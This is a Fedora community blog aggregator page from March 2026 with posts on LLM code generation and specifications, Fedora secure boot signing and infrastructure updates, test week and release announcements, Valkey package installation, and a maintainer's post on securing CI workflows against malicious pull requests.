26 Mar 2026

feedFedora People

Fedora Infrastructure Status: Matrix server maintenance

26 Mar 2026 11:50am GMT

25 Mar 2026

feedFedora People

Fedora Infrastructure Status: Updates and reboots on Fedora infrastructure

25 Mar 2026 10:00pm GMT

23 Mar 2026

feedFedora People

Brian (bex) Exelbierd: Reflecting on “Warranty Void If Regenerated”

Brian (bex) Exelbierd's avatar

I've seen "Warranty Void if Regenerated" going around, particularly among the subset of my friends who believe "LLMs are slop generators". They typically characterize it as overly optimistic - hopeful, if not downright fantasy.

The "slop generator" position is, in my opinion, demonstrably false, as countless successful code generation outcomes contradict such a sweeping generalization. The dogged pursuit of this position clouds the issue of the real concerns with LLMs as built and used today. I believe there are legitimate company ethics, environmental, and license/copyright concerns worthy of consideration in this space. I also believe that we are still in a highly emotional place where those concerns tend to be both understated and overstated depending on who is talking.

The story consists of three vignettes told from the perspective of Tom, a post-transition specification repair person who works with farmers. In this universe, all code is generated from specs and average humans are making custom software constantly. Domain experts are needed to refine, debug, and in some cases wholesale write the specifications.

There is also a great discussion of the human impact of this post-transition existence. I encourage you to read it, but I'm not addressing that below - not because it isn't important, but because I want to preserve focus on the "slop generator" drumbeat that feels so misguided.

All in all, I think the piece is well written and that Scott Werner did a great job. This isn't a critique of the writing or the story itself. I also don't know what Scott's perspective is on LLMs, though their public pages and site lead me to believe they are not anti-generative AI.

I'd been harboring a delusion in the back of my mind about trying to write a story about a "machine whisperer". Scott's piece reminded me that I am likely still not a creative writer, and I'm glad for their work here.

My thesis here is simple: this story reads like a set of specification and contract failures. It does not read like evidence that code generation inherently produces "slop" or that opaque code from code generation is inherently a failed concept. To be clear here, this is not a critique of Scott's view, but instead of the "slop generator" view point.

Margaret

Margaret has generated software that pulls in various data sets from both their farm and external sources to predict the best time to harvest. Their latest harvest was harvested before it should have been, and Tom realizes that the specification failed to include a requirement that it raise an error if a data source's structure or methodology changed. Instead, the system absorbed the data from an updated methodology and didn't change how it used that data.

This is shown to be a specification problem. The spec as written didn't suggest that changes were possible or that they should be monitored for, so the generated system didn't do that.

While this happens with, I suspect, regularity in hand-coded systems, my point isn't that this is normal. When it happens in a hand-coded system, it is wrong too. And, importantly, it is also a specification error.

There may never have been a specification in the first place and the developer was just expected to figure this out. Depending on their experience and other conditions, they either did … or they didn't. A clearer spec or set of standards (a/k/a a system prompt) would have fixed this in both cases.

Pit Crew

Scott introduces pit crews in this anecdote. These are people who monitor ongoing quality and concerns.

Today we often approximate this with monitoring systems that we hope are checking the right things, perhaps even with real end-to-end live tests running on a regular basis. We don't generally dedicate human teams to it.

Whether we ever hit post-transition or not, this begs for a conversation: is QE/QA solely a pre-ship function, or should we be leveraging that knowledge to monitor delivered software in ways that go deeper than what we typically monitor today? What does the SRE practice in this space look like?

Framed that way, the pit crew in the story is less a bandage for sloppy generated code and more the missing extension of our specifications and contracts into how we watch systems evolve over time.

Ethan

Ethan has generated a multitude of tools and they are all communicating with each other. Ethan is a microservice machine.

Ethan, much like Margaret, has a data feed problem. This time one of his own tools made a change in the methodology and calculated a value per-hundredweight instead of per-head. While not stated in the story, this unit for output was chosen at generation because it wasn't in the specification and the specification also didn't have a way (or likely even a requirement) to flag changes. The downstream tool didn't get a read failure but began using this new data value as though it was still per-head. This resulted in poor market price prediction.

The story is similar to Margaret's except it is more like when Team A breaks Team B in your own company.

For me it raises the interesting point that while we tend to believe otherwise, in many cases our APIs and data formats are our only true contracts. They operate only at the level where they exist. The internals of our dependencies, or the work of other teams, are opaque, and you could say that they may "regenerate" their code every day of the week and you just have to hope it still works for your consumption and use. You have to rely on them not breaking the contract and ensure the contract provides the guarantees you need.

Choreographer

A choreographer is a post-transition architect. It is, in my opinion, the thing we should all be if we are going to use LLMs to generate code.

Here a choreographer goes through Ethan's systems and defines their interface contracts and layers. They also notice that some tools are unnecessary, while others have formed a sub-network that has no effect. The output of this person's work is a cleaned up system that functions as a whole and not a set of discrete parts.

This is something we already have to do in large systems, and it's something that people generating code still have to do. I suspect that some concepts like Gastown try to push parts of this work into a different layer of tooling. And it may even work.

LLM generation and reasoning capacity is getting higher, but none of this eliminates the need for this role or for specification correctness. This is something which we've basically never had. Even waterfall failed here.

In this sense, the story reads less like an indictment of generation and more like a warning about what happens when we refuse to name, own, and maintain those contracts across a growing system.

Carol

Carol's farm illustrates the ugly mess of things we give automation and then complain about.

In this specific case there is a new irrigation system that is using all of the sensors it has to maintain a 60% moisture level across the farm. This results in under- and over-irrigation in some places because the moisture level in those places is influenced by external factors. The system is doing exactly what it was asked to do. The problem is that the target it was given is a bad fit for the actual farm not that the generated system is inherently bad.

Note: I am not a farmer, so I am taking this example at face value.

The short version is that drainage is funny in some places, other places are getting more wind, and still others need slightly differing levels based on the actual crop in that spot. None of this data has been provided to the system, and the story makes it clear that most of it is not in any system.

The farmer just understands their land and can look at it and tell you what is going to happen based on 30 years of real history and 30 years of experience. This is also not new. This is the art and practice of both coding and system administration, and we have failed to codify it usefully to date. We shouldn't hold our new system accountable for that, but we also shouldn't pretend that "just write a better spec" is an easy button when so much of the domain is still tacitly known and not shared beyond tribal means.

This is perhaps the one vignette that gives me pause. Even if we can find code generation (it doesn't have to be LLMs) that writes to a specification, we may still be unsuccessful when our measurements, abstractions, and language can't yet capture the thing we actually care about.

Right now we make surgical tweaks to the code to encode these lessons as we learn them. Specifying them in human language is often difficult, and maybe that is the core problem. The boundary here isn't really "hand-written vs generated code", it is between where, as technologists, we have experience stating precisely enough and where we don't have a history of doing that well.

But we work in a precise space. In the case of Carol's farm, Carol and Tom are able to describe the core problems pretty quickly, and I suspect, given time, could come up with data feeds, additional sensors, or equations that describe the issues sufficiently to fix the irrigation system.

It would be hyper-customized to Carol's farm, but in many ways that is what she wants and needs - and it's something we fail to deliver, in general, today. Even here, though, calling the outcome "slop" feels like a category error: the system is faithfully pursuing the narrow, naive target we gave it, not spewing random garbage.

The Real Conversation

I wrote this piece in part because the anti-LLM rhetoric of "they are slop generators" gets under my skin. There are a lot of valid reasons to be anti-LLM today. This is not one.

Reading the story reinforced that for me: what fails in these vignettes are specs, contracts, and incentives, not some inherent "slop" property of generated code. The story isn't an indictment of generated code, it's a parable about the timeless need for human wisdom, clear communication, and rigorous oversight, no matter how the code comes to be.

I'd like to see our LLM conversations stick closer to the concrete and demonstrably true. Let's focus on what these systems do, where they fail, and how our specs and contracts are part of that story, instead of getting pulled into slogans like "slop generator" that, by being false, derail the conversation. This creates space for us to have the real conversations that matter around ethics, the environment, and training data usage.

23 Mar 2026 10:50am GMT

Alexander Bokovoy: ASN.1 for legacy apps: Synta

23 Mar 2026 8:33am GMT

21 Mar 2026

feedFedora People

Matthew Garrett: SSH certificates and git signing

21 Mar 2026 7:38pm GMT

Kevin Fenzi: misc fedora bits third week of march 2026

Kevin Fenzi's avatar Scrye into the crystal ball

Things are just flying by and it seems to be saturday again, so here's another weekly recap.

Secureboot signing

Most of my week was consumed with work on our secure boot signing infrastructure. The old setup was using smart cards in specific builders. This had a lot of disadvantages, including:

  • space on the smart cards was pretty much full, preventing adding more certs

  • Those machines were 'special' and if they went down/broke things would be bad.

  • The smart cards in them are not even made anymore or supported, so we couldn't get more for adding more builders.

So, thanks to a bunch of work from Jeremy Cline we finally have things moved over to the new setup. This setup is:

  • Using our normal signing infrastructure (sigul, soon to be replaced by a rust re-write). We can easily decide in config which machines are used.

  • Using a new hardware on the vault end that has more space for more certs.

  • Allows us to easily add a aarch64 path to sign there.

The signed aarch64 grub2 build is in rawhide now, but for whatever reason it's not working on my slim7x. It is however working in vm's, cloud providers and other hardware, so I suspect it might be just a problem with this laptop. It also doesn't work with my Radxa Orion O6, but again could be something going on there. I think it's at least good enough to get more widespread testing.

We should hopefully have a signed kernel next week, but in the mean time if you have a arm device that supports secureboot, you can update to the latest grub2 and give it a try.

Openh264 builds

We seem to have dropped the ball on f44/f45 openh264 builds. :(

So, I looked at doing some this week. I ran into a linker issue on the i686 builds, but managed to work around that and get builds.

Now we just need to wait for cisco to publish them. I am hoping this process will go much quicker than it has in the past, since we have a better way to upload things for them now.

Time will tell.

Openshift cluster upgrades

I moved all our openshift clusters to 4.21.5 this week (from 4.20.15).

I really love how easy openshift upgrades are. Press button and wait usually. I did have to uprgade to the latest 4.20 first before it would let me move to 4.21, but both steps went fine.

Mass update / reboots next week

Next week we will be catching up on updates all around and rebooting things. The week after we start Fedora 44 Final freeze so we want to have things all updated before that. No special stuff this time, just updates/reboots so I expect it to go smoothly.

comments? additions? reactions?

As always, comment on mastodon: https://fosstodon.org/@nirik/116268414239551452

21 Mar 2026 5:25pm GMT

Fedora Magazine: Contribute at the Fedora CoreOS 44 Test Week

Fedora Magazine's avatar

The Fedora CoreOS and QA teams are gearing up for Fedora 44, and we need your help! We are organizing a Test Week running from March 23 to March 27, 2026.

This event is a nice opportunity for the community to test Fedora CoreOS (FCOS) based on Fedora 44 content before it officially reaches the testing and stable streams. By participating, you help us ensure a smooth and reliable experience for all users.

How does a Test Week work?

A Test Week is an event where anyone can help verify that the upcoming release works as expected. If you've been looking for a way to get started with Fedora contribution, this is the perfect entry point.

To participate, you simply need to:

The Wiki Page is your primary source of information for this event. Once you have completed your tests, please log your results here! Your contribution, big or small, makes a huge difference. Let's work together to make this release a great one. Happy testing!

Join the Live Sync Session

Want to chat with the team? We are hosting a virtual in-person session on Tuesday, March 24, from 3:00 PM - 4:30 PM UTC. Drop in to ask questions and get help with testing!

Video Meeting: meet.google.com/ufp-bwsb-zwh

21 Mar 2026 8:00am GMT

20 Mar 2026

feedFedora People

Fedora Community Blog: Community Update – Week 12 2026

Fedora Community Blog's avatar

This is a report created by CLE Team, which is a team containing community members working in various Fedora groups for example Infrastructure, Release Engineering, Quality etc. This team is also moving forward some initiatives inside Fedora project.

Week: 16 - 20 March 2026

Fedora Infrastructure

This team is taking care of day to day business regarding Fedora Infrastructure.
It's responsible for services running in Fedora infrastructure.
Ticket tracker

CentOS Infra including CentOS CI

This team is taking care of day to day business regarding CentOS Infrastructure and CentOS Stream Infrastructure.
It's responsible for services running in CentOS Infratrusture and CentOS Stream.
CentOS ticket tracker
CentOS Stream ticket tracker

Release Engineering

This team is taking care of day to day business regarding Fedora releases.
It's responsible for releases, retirement process of packages and package builds.
Ticket tracker

RISC-V

This is the summary of the work done regarding the RISC-V architecture in Fedora.

AI

This is the summary of the work done regarding AI in Fedora.

QE

This team is taking care of quality of Fedora. Maintaining CI, organizing test days
and keeping an eye on overall quality of Fedora releases.

Forgejo

This team is working on introduction of https://forge.fedoraproject.org to Fedora
and migration of repositories from pagure.io.

EPEL

This team is working on keeping Epel running and helping package things.

UX

This team is working on improving User experience. Providing artwork, user experience,
usability, and general design services to the Fedora project

If you have any questions or feedback, please respond to this report or contact us on #admin:fedoraproject.org channel on matrix.

The post Community Update - Week 12 2026 appeared first on Fedora Community Blog.

20 Mar 2026 12:00pm GMT

Fedora Badges: New badge: Chemnitzer Linux-Tage 2026 !

20 Mar 2026 4:21am GMT

19 Mar 2026

feedFedora People

Christof Damian: Friday Links 26-10

19 Mar 2026 11:00pm GMT

Peter Czanik: My new toy: FreeBSD on the HP Z2 mini revisited

19 Mar 2026 9:43am GMT

18 Mar 2026

feedFedora People

Peter Czanik: Central log collection - more than just compliance

18 Mar 2026 3:10pm GMT

Fedora Magazine: Fedora Asahi Remix 43 is now available

Fedora Magazine's avatar

We are happy to announce the general availability of Fedora Asahi Remix 43. This release brings Fedora Linux 43 to Apple Silicon Macs.

Fedora Asahi Remix is developed in close collaboration with the Fedora Asahi SIG and the Asahi Linux project. This release incorporates all the exciting improvements brought by Fedora Linux 43. Notably, package management is significantly upgraded with RPM 6.0 and the new DNF5 backend for PackageKit for Plasma Discover and GNOME Software ahead of Fedora Linux 44. It also continues to provide extensive device support. This includes newly added support for the Mac Pro, microphones in M2 Pro/Max MacBooks, and 120Hz refresh rate for the built-in displays for MacBook Pro 14/16 models.

Fedora Asahi Remix offers KDE Plasma 6.6 as our flagship desktop experience. It contains all of the new and exciting features brought by Fedora KDE Plasma Desktop 43. It also features a custom Calamares-based initial setup wizard. A GNOME variant is also available, featuring GNOME 49, with both desktop variants matching what Fedora Linux offers. Fedora Asahi Remix also provides a Fedora Server variant for server workloads and other types of headless deployments. Finally, we offer a Minimal image for users that wish to build their own experience from the ground up.

You can install Fedora Asahi Remix today by following our installation guide. Existing systems running Fedora Asahi Remix 41 or 42 should be updated following the usual Fedora upgrade process. Upgrades via GNOME's Software application are unfortunately not supported. Either KDE's Plasma Discover or DNF's System Upgrade command must be used.

Please report any Remix-specific issues in our tracker, or reach out in our Discourse forum or our Matrix room for user support.

18 Mar 2026 2:00pm GMT

Ben Cotton: A trust paradox

Ben Cotton's avatar

Last month, I wrote about how to define, build, and measure trust in your community. Here's the challenge: you need to extend trust in order for someone to build trust. I touched on this in 2023 after an Ubuntu release included hate speech in translations. It came back to the fore earlier this month after an AI agent attacked a handful of high-profile GitHub repositories.

The agent took advantage of workflows that allowed an attacker to run malicious code via a variety of mechanisms, including the branch name. The attacking agent only needed to open a pull request to cause damage. Normally, tests run by CI infrastructure are a way to evaluate the trustworthiness of a pull request. Most pull requests, of course, are not malicious, but that doesn't make them trustworthy. A change that fails linting, unit tests, or integration tests may not be worth a maintainer's time to review.

So if automated CI tests are both a way to measure trust and a vector for attack, what's the responsible maintainer to do?

The first step is to make sure your CI jobs are securely configured. Tools like zizmor can identify insecure configurations. You may also want to require that a maintainer manually approve workflows before running against pull requests from untrusted sources. This, of course, puts you into a position where you now have to at least give a cursory review to make sure the change is safe enough for your CI workflow. But that's less work than a detailed review.

With the rise in AI-generated pull requests, this is a problem that will only add more toil for maintainers. Hopefully, platforms will provide tools that reduce the burden.

This post's featured photo by 愚木混株 Yumu on Unsplash.

The post A trust paradox appeared first on Duck Alignment Academy.

18 Mar 2026 12:00pm GMT

Remi Collet: 📝 Valkey version 9.1 🎲

Remi Collet's avatar

RPMs of Valkey version 9.1 are available in the remi-modular repository for Fedora ≥ 42 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

⚠️ Warning: this is a pre-release version not ready for production usage.

1. Installation

Packages are available in the valkey:remi-9.1 module stream.

1.1. Using dnf4 on Enterprise Linux

# dnf install https://rpms.remirepo.net/enterprise/remi-release-<ver>.rpm
# dnf module switch-to valkey:remi-9.1/common

1.2. Using dnf5 on Fedora

# dnf install https://rpms.remirepo.net/fedora/remi-release-<ver>.rpm
# dnf module reset  valkey
# dnf module enable valkey:remi-9.1
# dnf install valkey

The valkey-compat-redis compatibility package is not available in this stream. If you need the Redis commands, you can install the redis package.

2. Modules

Some optional modules are also available:

These packages are weak dependencies of Valkey, so they are installed by default (if install_weak_deps is not disabled in the dnf configuration).

The Modules are automatically loaded after installation and service (re)start.

3. Future

Valkey also provides a set of modules, which may be submitted for the Fedora official repository.

ℹ️ Notices:

4. Statistics

valkey

18 Mar 2026 9:29am GMT

17 Mar 2026

feedFedora People

Peter Czanik: My new toy: AI first steps with the HP Z2 Mini

17 Mar 2026 1:40pm GMT